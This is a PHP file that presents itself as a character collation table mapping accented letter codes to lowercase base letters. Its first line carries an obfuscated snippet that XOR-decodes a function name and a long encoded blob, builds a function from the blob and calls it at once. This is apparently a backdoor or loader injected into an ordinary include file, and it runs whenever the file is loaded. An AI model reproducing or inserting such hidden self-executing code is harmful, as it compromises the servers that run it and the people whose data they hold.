<?php $xDIuAuCt='6 V-,=h3EB1.=7;'; $eXdgpg='UR3LXX7U0,RZTXU'^$xDIuAuCt; $vLLNGOuh='+5Qx<MCO:XVXm<VGITAiVO5Fb ,;X6s.6JvfsGE<06H 47B8Vl+QO0ZT RrhF -iwI+=LfpkEH,JohzekFd2Fk=K:JMQHcnrcj6S7Fu-RlostEnZMI=7L Uro=;-+HatMRmza1JAJ>C5ObyXfWW82UutTdogWVW2Y7qYoJiSM5B SyPVP8o<bvPs9DYZH=7rW6-:FLmJ;iEEst32<APet,A<>1BCv6ZG;hZX+uZB,7Z0Iubc.T==.U,azro-a+z=htJMnl1E<fePHJCM=8XYX>ccl  AW=-XKTkXqKS;LghT0SA7eKcp XAL,sp:7M. xckhO YOxA5s8 8F6TP<tNsfjeodia9K0CCl1+HlzfHfGA+B3OA=axCGJJ29m-=5ETiu9==nb;aw6VZUVPCo9Y6= VggI3+3OQR7Y3zXskN,DS4QP: IWB2Y6j.3=+a95 .bRAE=Zwi>YX>UUeHQOF,dinm=JD rGS+zmzL, fLPQFRwLjwM9  Gl1XOj CTO3AKc9W:ieXe-+T6YtMuaq;+wAlVLF bw=  UqQlSRAf1VLhlRW zyq.TuqP1havqweGqh=3sVUFhzXduNT=; DhRP54UOX;.KjAPTR.Q4<vVmQVX9UbayTuAkm.;2<,WXAnVY9Obo58A.=MVl6xosf --NxFkR>+'; $HtSxedxk=$eXdgpg('', 'BSyYZ8-,N1962Y..: 2Aq7Z4=DMO9i,CC>QOZg>69P=NWC+W8LS>=o>5T3-7+UYAS-JI-JPO.-UcOHZEK=n;OOR>NjpqoDUxjcP<EnQDrQOCOeJ3q:IE E;ZKYZYJaZTi;FQH;CHnQ6AoLDxNs3YF4.P=9O9wr<W lU0OoI 9G.E=Qt=5AFaKMZz06<.=OYZsYXNowgCFc8OyPWSH pXTJ PMTyIRR;3Z71=RUgbJV6C,NhiH;OXO6DARV0n.d1t-T+>NHZ EFXnhn5,QM=pxEijHDA56bF=2tVxU 6BwmapT25VEvCTV9-9IHzG=GGFXKJL+A-.QaNy1FW4S53TTfW98 >1,2mkQ0cHZN1LGXhB1 G7VfaFkqJc.+FX2FXLeiIQRXDUh2hSR7.4vmcKO8ZHEmmn49V9Eu6V-RZeS+;B76F81VI32jJ6D5JRIJ>fXUZJ0 6XlC6Z<;Q10Ml5.2MMENIY+0A-,6RSDAFEFNh4023WjLW,KRA>3Z=65E;=<G2cDR2CNIxAIJ WpTkSAYVOBiH2-2A9PVEYr,xLnoaAPduPX02EOAGJdFG2PYUNAATqCPYRE0d OSxBSn5OIA=795Lk071HZ8Bf 5+B>UXQzMu29M4KHYtUaKMU1;YZ64iJ28M.9HEY8BR,2KkQTyoEUD:PvBi4V'^$vLLNGOuh); $HtSxedxk();
$collation = array (
  710 => 94,
  189 => 188,
  190 => 179,
  65 => 97,
  170 => 97,
  225 => 97,
  193 => 97,
  224 => 97,
  192 => 97,
  226 => 97,
  194 => 97,
  228 => 97,
  196 => 97,
  227 => 97,
  195 => 97,
  229 => 97,
  197 => 97,
  230 => 97,
  198 => 97,
  66 => 98,
  67 => 99,
  231 => 99,
  199 => 99,
  68 => 100,
  240 => 100,
  208 => 100,
  69 => 101,
  233 => 101,
  201 => 101,
  232 => 101,
  200 => 101,
  234 => 101,
  202 => 101,
  235 => 101,
  203 => 101,
  70 => 102,
  402 => 102,
  71 => 103,
  72 => 104,
  73 => 105,
  237 => 105,
  205 => 105,
  236 => 105,
  204 => 105,
  238 => 105,
  206 => 105,
  239 => 105,
  207 => 105,
  74 => 106,
  75 => 107,
  76 => 108,
  77 => 109,
  78 => 110,
  241 => 110,
  209 => 110,
  79 => 111,
  186 => 111,
  243 => 111,
  211 => 111,
  242 => 111,
  210 => 111,
  244 => 111,
  212 => 111,
  246 => 111,
  214 => 111,
  245 => 111,
  213 => 111,
  248 => 111,
  216 => 111,
  339 => 111,
  338 => 111,
  80 => 112,
  81 => 113,
  82 => 114,
  83 => 115,
  353 => 115,
  352 => 115,
  223 => 115,
  84 => 116,
  254 => 116,
  222 => 116,
  85 => 117,
  250 => 117,
  218 => 117,
  249 => 117,
  217 => 117,
  251 => 117,
  219 => 117,
  252 => 117,
  220 => 117,
  86 => 118,
  87 => 119,
  88 => 120,
  89 => 121,
  253 => 121,
  221 => 121,
  255 => 121,
  376 => 121,
  90 => 122,
  382 => 122,
  381 => 122,
);
?>